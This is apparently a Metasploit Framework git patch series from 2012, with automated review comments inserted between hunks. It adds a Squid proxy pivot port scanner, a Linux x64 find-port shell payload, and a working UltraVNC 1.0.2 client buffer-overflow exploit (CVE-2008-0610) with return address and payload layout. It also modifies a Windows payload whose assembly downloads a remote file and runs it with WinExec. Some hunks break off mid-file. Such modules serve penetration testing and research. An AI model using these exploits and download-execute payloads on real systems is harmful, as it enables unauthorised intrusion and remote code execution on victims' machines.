From 0f17bbdfdd91cf21bdf2d93652e5fb0b0fa4e5b7 Mon Sep 17 00:00:00 2001
From: Willis Vandevanter
Date: Tue, 6 Mar 2012 00:30:30 -0500
Subject: [PATCH 01/46] squid pivot scanning module
---
 .../scanner/http/squid_pivot_scanning.rb | 130 ++++++++++++++++++
 1 file changed, 130 insertions(+)
 create mode 100644 modules/auxiliary/scanner/http/squid_pivot_scanning.rb
diff --git a/modules/auxiliary/scanner/http/squid_pivot_scanning.rb b/modules/auxiliary/scanner/http/squid_pivot_scanning.rb
new file mode 100644
index 0000000000..b6471c55af
--- /dev/null
+++ b/modules/auxiliary/scanner/http/squid_pivot_scanning.rb
@@ -0,0 +1,130 @@
+##
+# $Id$
+##
+
+##
+# This file is part of the Metasploit Framework and may be subject to
+# redistribution and commercial restrictions. Please see the Metasploit
+# web site for more information on licensing and terms of use.
+# http://metasploit.com/
+##
+
+require 'msf/core'
+require 'rex/socket/range_walker'
+
+class Metasploit3 < Msf::Auxiliary
+
+ # Exploit mixins should be called first
+ include Msf::Exploit::Remote::HttpClient
+ # Scanner mixin should be near last
+ include Msf::Auxiliary::Scanner
+ include Msf::Auxiliary::Report
+
+ def initialize
+ super(
+ 'Name' => 'Squid Proxy Port Scanner',
+ 'Description' => %q{
+ A misconfigured Squid proxy can allow an attacker to make requests on their behalf.
+ This may give the attacker information about devices that they cannot reach but the
+ squid proxy can. For example, an attacker can make requests for internal IP addresses
+ against a misconfigurated open squid proxy exposed to the Internet therefore performing
+ an internal port scan. The error messages returned by the proxy are used to determine
+ if the port is open or not. Many squid proxies use custom error codes so your mileage
+ may vary.
+ },
+ 'Author' => ['willis'],
+ 'Version' => '$Revision$',
+ 'References' =>
+ [
+ 'URL','http://wiki.squid-cache.org/SquidFaq/SecurityPitfalls'
+ ],
+
+ 'License' => MSF_LICENSE
+ )
+
+ register_options(
+ [
+ OptString.new('RANGE', [true, "IPs to scan through squid proxy", '']),
+ OptString.new('PORTS', [true, "Ports to scan; must be TCP", "21,80,139,443,445,1433,1521,1723,3389,8080,9100"]),
+ OptBool.new('MANUAL_CHECK',[true,"Stop the scan if server seems to answer positively to every request",true])
+ ], self.class)
+
+ end
+
+ def run_host(target_host)
+
+ begin
+ iplist = Rex::Socket::RangeWalker.new(datastore['RANGE'])
+ dead = false
+ vprint_status("#{iplist.length} total IPs")
+ portlist = Rex::Socket.portspec_crack(datastore['PORTS'])
+
+ iplist.each do |target|
+ portlist.each do |port|
+ next if dead
+
+ vprint_status("[#{rhost}] Running test check")
+ #request a non-existent page first to make sure the server doesn't respond with a 200 to everything.
+ res = send_request_cgi({
+ 'uri' => "http://127.0.11.1:80",
+ 'method' => 'GET',
+ 'data' => '',
+ 'version' => '1.0',
+ 'vhost' => ''
+ }, 10)
+
+ if res and res.body and (res.code == 200)
+ print_error("#{rhost} likely answers positively to every request, check it manually.")
+ print_error("\t\t Proceeding with the scan may increase false positives.")
+ manual = true
+ end
+
+ next if manual and datastore['MANUAL_CHECK']
+
+ vprint_status("[#{rhost}] Checking #{target}:#{port}")
+ if port==443
+ res = send_request_cgi({
+ 'uri' => "https://#{target}:#{port}",
+ 'method' => 'GET',
+ 'data' => '',
+ 'version' => '1.0',
+ 'vhost' => ''
+ }, 10)
+ else
+ res = send_request_cgi({
+ 'uri' => "http://#{target}:#{port}",
+ 'method' => 'GET',
+ 'data' => '',
+ 'version' => '1.0',
+ 'vhost' => ''
+ }, 10)
+ end
+
+ if res and res.body
+
+ if res.code == 200 or res.body =~ /Zero/ or res.code == 404 or res.code == 401
+ print_good("[#{rhost}] #{target}:#{port} seems OPEN")
+ report_service(:host => target, :port
+ => port, :name => "unknown", :info => res.body )
+ end
+ if res.body =~ /No route to host/
+ dead = true
+ print_bad("[#{rhost}] #{target} is DEAD")
+ end
+
+ print_status("[#{rhost}] #{target}:#{port} blocked by ACL") if res.body =~ /Access control/
+
+ if res.body =~ /Connection refused/ or res.body =~ /service not listening/
+ report_host(:host => target)
+ print_good("[#{rhost}] #{target} is alive but #{port} is CLOSED")
+ end
+ end
+ end
+ dead = false
+ end
+
+ rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout
+ rescue ::Timeout::Error, ::Errno::EPIPE
+
+ end
+ end
+end
From 461a59e28d6667fc770c8a2353faf599266c3298 Mon Sep 17 00:00:00 2001
From: Willis Vandevanter
Date: Tue, 6 Mar 2012 00:48:54 -0500
Subject: [PATCH 02/46] modified description and lowered the number of required requests
---
 .../scanner/http/squid_pivot_scanning.rb | 54 ++++++++++---------
 1 file changed, 29 insertions(+), 25 deletions(-)
diff --git a/modules/auxiliary/scanner/http/squid_pivot_scanning.rb b/modules/auxiliary/scanner/http/squid_pivot_scanning.rb
index b6471c55af..e1de4e497c 100644
--- a/modules/auxiliary/scanner/http/squid_pivot_scanning.rb
+++ b/modules/auxiliary/scanner/http/squid_pivot_scanning.rb
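Review bot: In the new squid_pivot_scanning.rb (PATCH 01), both `rescue` clauses that close the `begin` block in `run_host` are empty, so a refused, unreachable or timed-out connection to the proxy ends the run with no output and the operator cannot tell "nothing open" from "the proxy never answered"; bind the exception with `=> e` and report it, e.g. `vprint_error("[#{rhost}] #{e.class}: #{e}")`. `'References'` is written as a flat `[ 'URL', '…' ]` pair, whereas the other modules in this series pass a list of pairs, so it should read `[ [ 'URL', 'http://wiki.squid-cache.org/SquidFaq/SecurityPitfalls' ] ]`. `report_service` also stores the entire proxy response body in `:info`; that body is untrusted and possibly large, so recording the status code or a short truncated excerpt would be safer for whatever later renders the database.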
@@ -26,11 +26,13 @@ class Metasploit3 < Msf::Auxiliary 'Description' => %q{ A misconfigured Squid proxy can allow an attacker to make requests on their behalf. This may give the attacker information about devices that they cannot reach but the - squid proxy can. For example, an attacker can make requests for internal IP addresses - against a misconfigurated open squid proxy exposed to the Internet therefore performing + Squid proxy can. For example, an attacker can make requests for internal IP addresses + against a misconfigurated open Squid proxy exposed to the Internet therefore performing an internal port scan. The error messages returned by the proxy are used to determine - if the port is open or not. Many squid proxies use custom error codes so your mileage - may vary. + if the port is open or not. Many Squid proxies use custom error codes so your mileage + may vary. The open_proxy module can be used to test for open proxies though a Squid proxy + does not have to be open in order to allow for pivoting (e.g. an Intranet Squid proxy which allows + the attack to pivot to another part of the network). }, 'Author' => ['willis'], 'Version' => '$Revision$', @@ -44,7 +46,7 @@ class Metasploit3 < Msf::Auxiliary register_options( [ - OptString.new('RANGE', [true, "IPs to scan through squid proxy", '']), + OptString.new('RANGE', [true, "IPs to scan through Squid proxy", '']), OptString.new('PORTS', [true, "Ports to scan; must be TCP", "21,80,139,443,445,1433,1521,1723,3389,8080,9100"]), OptBool.new('MANUAL_CHECK',[true,"Stop the scan if server seems to answer positively to every request",true]) ], self.class) 
@@ -56,32 +58,34 @@ class Metasploit3 < Msf::Auxiliary begin iplist = Rex::Socket::RangeWalker.new(datastore['RANGE']) dead = false - vprint_status("#{iplist.length} total IPs") portlist = Rex::Socket.portspec_crack(datastore['PORTS']) + vprint_status("[#{rhost}] Verifying manual testing is not required...") + + manual = false + #request a non-existent page first to make sure the server doesn't respond with a 200 to everything. + res_test = send_request_cgi({ + 'uri' => "http://127.0.11.1:80", + 'method' => 'GET', + 'data' => '', + 'version' => '1.0', + 'vhost' => '' + }, 10) + + if res_test and res_test.body and (res_test.code == 200) + print_error("#{rhost} likely answers positively to every request, check it manually.") + print_error("\t\t Proceeding with the scan may increase false positives.") + manual = true + end + + iplist.each do |target| + next if manual and datastore['MANUAL_CHECK'] + portlist.each do |port| next if dead - vprint_status("[#{rhost}] Running test check") - #request a non-existent page first to make sure the server doesn't respond with a 200 to everything. - res = send_request_cgi({ - 'uri' => "http://127.0.11.1:80", - 'method' => 'GET', - 'data' => '', - 'version' => '1.0', - 'vhost' => '' - }, 10) - - if res and res.body and (res.code == 200) - print_error("#{rhost} likely answers positively to every request, check it manually.") - print_error("\t\t Proceeding with the scan may increase false positives.") - manual = true - end - - next if manual and datastore['MANUAL_CHECK'] - - vprint_status("[#{rhost}] Checking #{target}:#{port}") + vprint_status("[#{rhost}] Requesting #{target}:#{port}") if port==443 res = send_request_cgi({ 'uri' => "https://#{target}:#{port}", From f91b89437545305837c8e8d069a24fce702ab5b8 Mon Sep 17 00:00:00 2001 
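Review bot: After hoisting the pre-check out of the loops, `run_host` still signals "stop" with `next if manual and datastore['MANUAL_CHECK']` inside `iplist.each`, so with MANUAL_CHECK set the module walks the whole RANGE doing nothing; a single `return if manual and datastore['MANUAL_CHECK']` placed before `iplist.each` says what is meant and ends at once. The probe URI `http://127.0.11.1:80` is a loopback address from the proxy's point of view, so a proxy host that runs its own web server on port 80 would presumably answer 200 and trip the check even though it does not answer positively to everything; a comment such as `# loopback address that should not be served; a 200 here means the proxy answers 200 for anything` would record the assumption. The `begin` block and the rest of the port loop continue outside this hunk.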
From: Maciej Kotowicz Date: Wed, 14 Mar 2012 22:39:56 +0100 Subject: [PATCH 03/46] added posibilities for generating payload from asm to more arch's added linux/x64/shell_find_port payload --- lib/msf/core/payload.rb | 10 ++- .../singles/linux/x64/shell_find_port.rb | 87 +++++++++++++++++++ 2 files changed, 95 insertions(+), 2 deletions(-) create mode 100644 modules/payloads/singles/linux/x64/shell_find_port.rb diff --git a/lib/msf/core/payload.rb b/lib/msf/core/payload.rb index 7610cc2164..45a7bf75ed 100644 --- a/lib/msf/core/payload.rb +++ b/lib/msf/core/payload.rb @@ -528,11 +528,17 @@ protected end # Assemble the payload from the assembly - sc = Metasm::Shellcode.assemble(Metasm::Ia32.new, asm).encoded + cpu = case module_info['Arch'] + when ARCH_X86 then Metasm::Ia32.new + when ARCH_X86_64 then Metasm::X86_64.new + when ARCH_PPC then Metasm::PowerPC.new + when ARCH_ARMLE then Metasm::ARM.new + end + sc = Metasm::Shellcode.assemble(cpu, asm).encoded # Calculate the actual offsets now that it's been built off.each_pair { |option, val| - off[option] = [ sc.offset_of_reloc(option), val[1] ] + off[option] = [ sc.offset_of_reloc(option) || val[0], val[1] ] } # Cache the payload blob diff --git a/modules/payloads/singles/linux/x64/shell_find_port.rb b/modules/payloads/singles/linux/x64/shell_find_port.rb new file mode 100644 index 0000000000..0273527c01 --- /dev/null +++ b/modules/payloads/singles/linux/x64/shell_find_port.rb 
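Review bot: The new `case module_info['Arch']` in lib/msf/core/payload.rb has no `else`, so any architecture outside the four listed leaves `cpu` as nil and the failure surfaces somewhere inside `Metasm::Shellcode.assemble` instead of as a clear error; add `else raise RuntimeError, "No assembler for arch #{module_info['Arch'].inspect}"`. If `module_info['Arch']` can hold an array (not visible here), none of the `when` branches would match either. In the same hunk `sc.offset_of_reloc(option) || val[0]` silently falls back to the hand-written offset when the label is missing from the assembly, which hides a disagreement between 'Offsets' and the source; the next patch in this series corrects exactly such a hand-written offset, so a warning when the fallback is taken would be worth having. The enclosing method starts and ends outside the hunk.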
@@ -0,0 +1,87 @@ +## +# $Id$ +## + +## +# This file is part of the Metasploit Framework and may be subject to +# redistribution and commercial restrictions. Please see the Metasploit +# web site for more information on licensing and terms of use. +# http://metasploit.com/ +## + +require 'msf/core' +require 'msf/core/handler/find_port' +require 'msf/base/sessions/command_shell' +require 'msf/base/sessions/command_shell_options' + +module Metasploit3 + + include Msf::Payload::Single + include Msf::Payload::Linux + include Msf::Sessions::CommandShellOptions + + def initialize(info = {}) + super(merge_info(info, + 'Name' => 'Linux Command Shell, Find Port Inline', + 'Version' => '$Revision$', + 'Description' => 'Spawn a shell on an established connection', + 'Author' => 'mak', + 'License' => MSF_LICENSE, + 'Platform' => 'linux', + 'Arch' => ARCH_X86_64, + 'Handler' => Msf::Handler::FindPort, + 'Session' => Msf::Sessions::CommandShellUnix, + 'Payload' => + { + 'Offsets' => + { + 'CPORT' => [ 29, 'n' ], + }, + + 'Assembly' => < Date: Thu, 15 Mar 2012 16:21:00 +0100 Subject: [PATCH 04/46] fix little mistake --- modules/payloads/singles/linux/x64/shell_find_port.rb | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/modules/payloads/singles/linux/x64/shell_find_port.rb b/modules/payloads/singles/linux/x64/shell_find_port.rb index 0273527c01..5b574a07d7 100644 --- a/modules/payloads/singles/linux/x64/shell_find_port.rb +++ b/modules/payloads/singles/linux/x64/shell_find_port.rb @@ -35,7 +35,7 @@ module Metasploit3 { 'Offsets' => { - 'CPORT' => [ 29, 'n' ], + 'CPORT' => [ 32, 'n' ], }, 'Assembly' => < Date: Wed, 21 Mar 2012 22:02:46 +0100 Subject: [PATCH 05/46] Added Base32 Support --- lib/rex/text.rb | 80 ++++++++++++++++++++++++++++++++++++++++++++++++- 1 file changed, 79 insertions(+), 1 deletion(-) diff --git a/lib/rex/text.rb b/lib/rex/text.rb index d18ba7ced3..98fbe756fe 100644 --- a/lib/rex/text.rb +++ b/lib/rex/text.rb 
@@ -32,6 +32,7 @@ module Text UpperAlpha = "ABCDEFGHIJKLMNOPQRSTUVWXYZ" LowerAlpha = "abcdefghijklmnopqrstuvwxyz" Numerals = "0123456789" + Base32 = "ABCDEFGHIJKLMNOPQRSTUVWXYZ234567" Alpha = UpperAlpha + LowerAlpha AlphaNumeric = Alpha + Numerals HighAscii = [*(0x80 .. 0xff)].pack("C*") 
@@ -692,6 +693,83 @@ module Text # ## + # + # Base32 code + # + + # Based on --> https://github.com/stesla/base32 + + # Copyright (c) 2007-2011 Samuel Tesla + + # Permission is hereby granted, free of charge, to any person obtaining a copy + # of this software and associated documentation files (the "Software"), to deal + # in the Software without restriction, including without limitation the rights + # to use, copy, modify, merge, publish, distribute, sublicense, and/or sell + # copies of the Software, and to permit persons to whom the Software is + # furnished to do so, subject to the following conditions: + + # The above copyright notice and this permission notice shall be included in + # all copies or substantial portions of the Software. + + # THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR + # IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, + # FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE + # AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER + # LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, + # OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN + # THE SOFTWARE. + + + # + # Base32 encoder + # + def self.b32encode(bytes_in) + n = (bytes_in.length * 8.0 / 5.0).ceil + p = n < 8 ? 5 - (bytes_in.length * 8) % 5 : 0 + c = bytes_in.inject(0) {|m,o| (m << 8) + o} << p + [(0..n-1).to_a.reverse.collect {|i| Base32[(c >> i * 5) & 0x1f].chr}, + ("=" * (8-n))] + end + + def self.encode_base32(str) + bytes = str.bytes + result = '' + size= 5 + while bytes.any? do + bytes.each_slice(size) do |a| + bytes_out = b32encode(a).flatten.join + result << bytes_out + bytes = bytes.drop(size) + end + end + return result + end + + # + # Base32 decoder + # + def self.b32decode(bytes_in) + bytes = bytes_in.take_while {|c| c != 61} # strip padding + n = (bytes.length * 5.0 / 8.0).floor + p = bytes.length < 8 ? 
5 - (n * 8) % 5 : 0 + c = bytes.inject(0) {|m,o| (m << 5) + Base32.index(o.chr)} >> p + (0..n-1).to_a.reverse.collect {|i| ((c >> i * 8) & 0xff).chr} + end + + def self.decode_base32(str) + bytes = str.bytes + result = '' + size= 8 + while bytes.any? do + bytes.each_slice(size) do |a| + bytes_out = b32decode(a).flatten.join + result << bytes_out + bytes = bytes.drop(size) + end + end + return result + end + # # Base64 encoder # @@ -1217,7 +1295,7 @@ protected def self.checksum8(str) str.unpack("C*").inject(:+) % 0x100 end - + def self.checksum16_le(str) str.unpack("v*").inject(:+) % 0x10000 end From 135cf7ba0473ef3287d6f95fae27ed0834a2606a Mon Sep 17 00:00:00 2001 From: Jonathan Cran Date: Fri, 23 Mar 2012 17:00:04 -0500 Subject: [PATCH 06/46] remove trailing comma, thanks troulouliou --- modules/auxiliary/admin/hp/hp_data_protector_cmd.rb | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/modules/auxiliary/admin/hp/hp_data_protector_cmd.rb b/modules/auxiliary/admin/hp/hp_data_protector_cmd.rb index cd1699d434..9dd65c6a71 100644 --- a/modules/auxiliary/admin/hp/hp_data_protector_cmd.rb +++ b/modules/auxiliary/admin/hp/hp_data_protector_cmd.rb @@ -46,7 +46,7 @@ class Metasploit3 < Msf::Auxiliary 'sinn3r' ], 'License' => MSF_LICENSE, - 'DisclosureDate' => "Feb 7 2011", + 'DisclosureDate' => "Feb 7 2011" )) register_options( @@ -96,4 +96,4 @@ class Metasploit3 < Msf::Auxiliary end end -end \ No newline at end of file +end From d8ddb19b569ace4702e9792e4a7dd7e5de5960ac Mon Sep 17 00:00:00 2001 From: Kurtis Miller Date: Sun, 25 Mar 2012 00:14:19 -0700 Subject: [PATCH 07/46] cve-2008-0610 windows exploit module --- modules/exploits/windows/vnc/cve-2008-0610.rb | 79 +++++++++++++++++++ 1 file changed, 79 insertions(+) create mode 100644 modules/exploits/windows/vnc/cve-2008-0610.rb diff --git a/modules/exploits/windows/vnc/cve-2008-0610.rb b/modules/exploits/windows/vnc/cve-2008-0610.rb new file mode 100644 index 0000000000..dba627c3ed --- /dev/null 
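Review bot: In lib/rex/text.rb, `b32decode` calls `Base32.index(o.chr)` without checking the result, so any byte outside the upper-case alphabet (lower-case letters, whitespace, stray punctuation) makes `index` return nil and the `inject` fails with a TypeError from inside the arithmetic. A decoder is the kind of helper that ends up parsing data it did not produce, so it should reject bad input explicitly, `Base32.index(o.chr) || raise(ArgumentError, "invalid Base32 character")`, and the method comment should say whether lower-case input is accepted (if so, `str.upcase` in `decode_base32`). In both `encode_base32` and `decode_base32` the outer `while bytes.any?` and the `bytes = bytes.drop(size)` reassignment inside `each_slice` are redundant, because `each_slice` already walks the whole input once; `str.bytes.each_slice(size) { |a| result << b32encode(a).flatten.join }` does the same work.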
+++ b/modules/exploits/windows/vnc/cve-2008-0610.rb 
@@ -0,0 +1,79 @@ +## +# $Id$ +## + +## +# This file is part of the Metasploit Framework and may be subject to +# redistribution and commercial restrictions. Please see the Metasploit +# web site for more information on licensing and terms of use. +# http://metasploit.com/ +## + +class Metasploit3 < Msf::Exploit::Remote + Rank = NormalRanking + + include Msf::Exploit::Remote::TcpServer + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'UltraVNC 1.0.2 Client Buffer Overflow', + 'Description' => %q{ + This module exploits a buffer overflow in UltraVNC Win32 + Viewer 1.0.2 Release. + + If a malicious server responds to a client connection indicating a minor + protocol version of 14 or 16, a 32-bit integer is subsequently read from + the TCP stream by the client and directly provided as the trusted size for + further reading from the TCP stream into a 1024-byte character array on + the stack. + }, + 'Author' => 'noperand', + 'License' => MSF_LICENSE, + 'Version' => '$Revision$', + 'References' => + [ + [ 'CVE', '2008-0610' ], + [ 'OSVDB', '42840' ], + [ 'BID', '27561' ], + ], + 'DefaultOptions' => + { + 'EXITFUNC' => 'thread', + }, + 'Payload' => + { + 'Space' => 500, + }, + 'Platform' => 'win', + 'Targets' => + [ + [ 'Windows XP SP3', { 'Ret' => 0x00421a61 } ], + ], + 'Privileged' => false, + 'DisclosureDate' => 'Feb 6 2008', + 'DefaultTarget' => 0)) + + register_options( + [ + OptPort.new('SRVPORT', [ true, "The VNCServer daemon port to listen on", 5900 ]) + ], self.class) + end + + def on_client_connect(client) + return if ((p = regenerate_payload(client)) == nil) + + sploit = rand_text_alpha(1100) # junk, could be more efficient here + sploit << "\x00\x04\x00\x00" # value to get around a write + sploit << rand_text_alpha(12) # random junk + sploit << "\xEB\x06\x90\x90" # short relative jump + sploit << [target.ret].pack('V') # pop/pop/ret (default is in vncviewer) + sploit << payload.encoded + + sploit = 
"\x52\x46\x42\x20\x30\x30\x33\x2e\x30\x31\x36\x0a" << [sploit.length].pack('N') << sploit + + print_status("Sending #{sploit.length} bytes to #{client.getpeername}:#{client.peerport}...") + client.put(sploit) + handler(client) + service.close_client(client) + end +end From 7ea37253a0edc1c7664cd18a3a7479163109991d Mon Sep 17 00:00:00 2001 From: Kurtis Miller Date: Sun, 25 Mar 2012 09:04:35 -0700 Subject: [PATCH 08/46] modifications recommended by sinn3r --- .../windows/vnc/{cve-2008-0610.rb => ultravnc_viewer_bof.rb} | 0 1 file changed, 0 insertions(+), 0 deletions(-) rename modules/exploits/windows/vnc/{cve-2008-0610.rb => ultravnc_viewer_bof.rb} (100%) diff --git a/modules/exploits/windows/vnc/cve-2008-0610.rb b/modules/exploits/windows/vnc/ultravnc_viewer_bof.rb similarity index 100% rename from modules/exploits/windows/vnc/cve-2008-0610.rb rename to modules/exploits/windows/vnc/ultravnc_viewer_bof.rb From e2606764cbe4bdd8b9c344077ef9fb4e83c34ce3 Mon Sep 17 00:00:00 2001 From: Kurtis Miller Date: Sun, 25 Mar 2012 09:08:38 -0700 Subject: [PATCH 09/46] forgot to add renamed module --- .../windows/vnc/ultravnc_viewer_bof.rb | 34 ++++++++++++++----- 1 file changed, 25 insertions(+), 9 deletions(-) diff --git a/modules/exploits/windows/vnc/ultravnc_viewer_bof.rb b/modules/exploits/windows/vnc/ultravnc_viewer_bof.rb index dba627c3ed..4dd150fe38 100644 --- a/modules/exploits/windows/vnc/ultravnc_viewer_bof.rb +++ b/modules/exploits/windows/vnc/ultravnc_viewer_bof.rb 
@@ -16,10 +16,9 @@ class Metasploit3 < Msf::Exploit::Remote def initialize(info = {}) super(update_info(info, - 'Name' => 'UltraVNC 1.0.2 Client Buffer Overflow', + 'Name' => 'UltraVNC 1.0.2 Client (vncviewer.exe) Buffer Overflow', 'Description' => %q{ - This module exploits a buffer overflow in UltraVNC Win32 - Viewer 1.0.2 Release. + This module exploits a buffer overflow in UltraVNC Viewer 1.0.2 Release. If a malicious server responds to a client connection indicating a minor protocol version of 14 or 16, a 32-bit integer is subsequently read from @@ -47,7 +46,7 @@ class Metasploit3 < Msf::Exploit::Remote 'Platform' => 'win', 'Targets' => [ - [ 'Windows XP SP3', { 'Ret' => 0x00421a61 } ], + [ 'Windows XP SP3', { 'Ret' => 0x00421a61 } ], # vncviewer.exe, 1.0.2 ], 'Privileged' => false, 'DisclosureDate' => 'Feb 6 2008', 
@@ -62,13 +61,30 @@ class Metasploit3 < Msf::Exploit::Remote def on_client_connect(client) return if ((p = regenerate_payload(client)) == nil) - sploit = rand_text_alpha(1100) # junk, could be more efficient here - sploit << "\x00\x04\x00\x00" # value to get around a write - sploit << rand_text_alpha(12) # random junk - sploit << "\xEB\x06\x90\x90" # short relative jump - sploit << [target.ret].pack('V') # pop/pop/ret (default is in vncviewer) + sploit = rand_text_alpha(1100) # junk, could be more efficient here + sploit << "\x00\x04\x00\x00" # value to get around a write + sploit << rand_text_alpha(12) # random junk + sploit << "\xEB\x06" << make_nops(2) # short relative jump + sploit << [target.ret].pack('V') # pop/pop/ret (default is in vncviewer.exe) sploit << payload.encoded +=begin + We prepend the initial 12 bytes including the servers' desired protocol version ("RFB 003.016"). + - These bytes are read directly by a call to ReadExact() with a size of 12. + + ... + if (m_minorVersion == 14 || m_minorVersion == 16) + { + int size; + ReadExact((char *)&size,sizeof(int)); + char mytext[1024]; //10k + ReadExact(mytext,size); + mytext[size]=0; + ... + + If minor version is 16 or 14, a 32-bit integer follows indicating the size of our data to read. + We then append our data. +=end sploit = "\x52\x46\x42\x20\x30\x30\x33\x2e\x30\x31\x36\x0a" << [sploit.length].pack('N') << sploit print_status("Sending #{sploit.length} bytes to #{client.getpeername}:#{client.peerport}...") From ad32911b1a97791c0bd49f49a21367d2ca1fc883 Mon Sep 17 00:00:00 2001 From: corelanc0d3r Date: Mon, 26 Mar 2012 12:30:03 +0200 Subject: [PATCH 10/46] probably safer to use regex --- modules/payloads/singles/windows/download_exec_https.rb | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/modules/payloads/singles/windows/download_exec_https.rb b/modules/payloads/singles/windows/download_exec_https.rb index 76d7b97f3b..f10f51eaf7 100644 
--- a/modules/payloads/singles/windows/download_exec_https.rb +++ b/modules/payloads/singles/windows/download_exec_https.rb @@ -92,12 +92,12 @@ module Metasploit3 if target_uri.length > 0 # get desired protocol - if target_uri.start_with?'http://' + if target_uri =~ /^http:/ proto = "http" port_nr = 80 dwflags_asm = "push (0x80000000 | 0x04000000 | 0x00200000 |0x00001000 |0x00002000 |0x00000200) ; dwFlags\n" end - if target_uri.start_with?'ftp://' + if target_uri =~ /^ftp:/ proto = "ftp" port_nr = 21 dwflags_asm = "push (0x80000000 | 0x04000000 | 0x00200000 |0x00001000 |0x00002000 |0x00000200) ; dwFlags\n" From 182f3744de428c772c1dd2c0515db3b81ca73f15 Mon Sep 17 00:00:00 2001 From: sinn3r Date: Mon, 26 Mar 2012 09:23:14 -0500 Subject: [PATCH 11/46] Cosmetic cleanup --- .../singles/windows/download_exec_https.rb | 145 +++++++++--------- 1 file changed, 71 insertions(+), 74 deletions(-) diff --git a/modules/payloads/singles/windows/download_exec_https.rb b/modules/payloads/singles/windows/download_exec_https.rb index f10f51eaf7..5b945b969e 100644 --- a/modules/payloads/singles/windows/download_exec_https.rb +++ b/modules/payloads/singles/windows/download_exec_https.rb @@ -12,7 +12,6 @@ require 'msf/core' - module Metasploit3 include Msf::Payload::Windows @@ -58,10 +57,10 @@ module Metasploit3 #;0x00000200 ; INTERNET_FLAG_NO_UI" exitfuncs = { - "PROCESS" => 0x56A2B5F0, #kernel32.dll!ExitProcess - "THREAD" => 0x0A2A1DE0, #kernel32.dll!ExitThread - "SEH" => 0x00000000, #we don't care - "NONE" => 0x00000000 #we don't care + "PROCESS" => 0x56A2B5F0, #kernel32.dll!ExitProcess + "THREAD" => 0x0A2A1DE0, #kernel32.dll!ExitThread + "SEH" => 0x00000000, #we don't care + "NONE" => 0x00000000 #we don't care } protoflags = { @@ -85,9 +84,9 @@ module Metasploit3 # - port # - /path/to/file - server_uri = '' + server_uri = '' server_host = '' - port_nr = 443 # default + port_nr = 443 # default if target_uri.length > 0 
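Review bot: In download_exec_https.rb (the `@@ -92,12 +92,12 @@` hunk of PATCH 10), the new tests `target_uri =~ /^http:/` and `target_uri =~ /^ftp:/` are looser than the `start_with?` calls they replace: `^` matches at the start of any line rather than the start of the string, and the `//` is no longer required although the `gsub('http://','')` calls further down still expect it. If the aim is a stricter scheme check, anchor to the string and keep the separator, `target_uri =~ %r{\Ahttp://}i` and `target_uri =~ %r{\Aftp://}i`. The surrounding method begins and ends outside this hunk.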
@@ -97,6 +96,7 @@ module Metasploit3 port_nr = 80 dwflags_asm = "push (0x80000000 | 0x04000000 | 0x00200000 |0x00001000 |0x00002000 |0x00000200) ; dwFlags\n" end + if target_uri =~ /^ftp:/ proto = "ftp" port_nr = 21 @@ -107,7 +107,7 @@ module Metasploit3 target_uri = target_uri.gsub('http://','') #don't care about protocol target_uri = target_uri.gsub('https://','') #don't care about protocol target_uri = target_uri.gsub('ftp://','') #don't care about protocol - + server_info = target_uri.split("/") # did user specify a port ? @@ -120,7 +120,6 @@ module Metasploit3 server_host = server_parts[0] # get /path/to/remote/exe - for i in (1..server_info.length-1) server_uri << "/" 
@@ -130,8 +129,6 @@ module Metasploit3 end # get protocol specific stuff - - #create actual payload payload_data = < 300 - push eax ; read length - push ecx ; target buffer on stack - push esi ; hRequest - push 0xE2899612 ; hash( "wininet.dll", "InternetReadFile" ) + mov ah,0x03 ; eax => 300 + push eax ; read length + push ecx ; target buffer on stack + push esi ; hRequest + push 0xE2899612 ; hash( "wininet.dll", "InternetReadFile" ) call ebp - test eax,eax ; download failed? (optional?) - jz thats_all_folks ; failure -> exit + test eax,eax ; download failed? (optional?) + jz thats_all_folks ; failure -> exit - pop eax ; how many bytes did we retrieve ? + pop eax ; how many bytes did we retrieve ? - test eax,eax ; optional? - je close_and_run ; continue until it returns 0 + test eax,eax ; optional? + je close_and_run ; continue until it returns 0 write_to_file: - push 0 ; lpOverLapped - push esp ; lpNumberOfBytesWritten - push eax ; nNumberOfBytesToWrite - lea eax,[esp+0xc] ; get pointer to buffer - push eax ; lpBuffer - push ebx ; hFile - push 0x5BAE572D ; kernel32.dll!WriteFile + push 0 ; lpOverLapped + push esp ; lpNumberOfBytesWritten + push eax ; nNumberOfBytesToWrite + lea eax,[esp+0xc] ; get pointer to buffer + push eax ; lpBuffer + push ebx ; hFile + push 0x5BAE572D ; kernel32.dll!WriteFile call ebp - sub esp,4 ; set stack back to where it was + sub esp,4 ; set stack back to where it was jmp download_more close_and_run: push ebx - push 0x528796C6 ; kernel32.dll!CloseHandle + push 0x528796C6 ; kernel32.dll!CloseHandle call ebp execute_file: - push 0 ; don't show - push edi ; lpCmdLine - push 0x876F8B31 ; kernel32.dll!WinExec + push 0 ; don't show + push edi ; lpCmdLine + push 0x876F8B31 ; kernel32.dll!WinExec call ebp thats_all_folks: From 507dd423cec540285f738c42bc6de81a8a9de242 Mon Sep 17 00:00:00 2001 
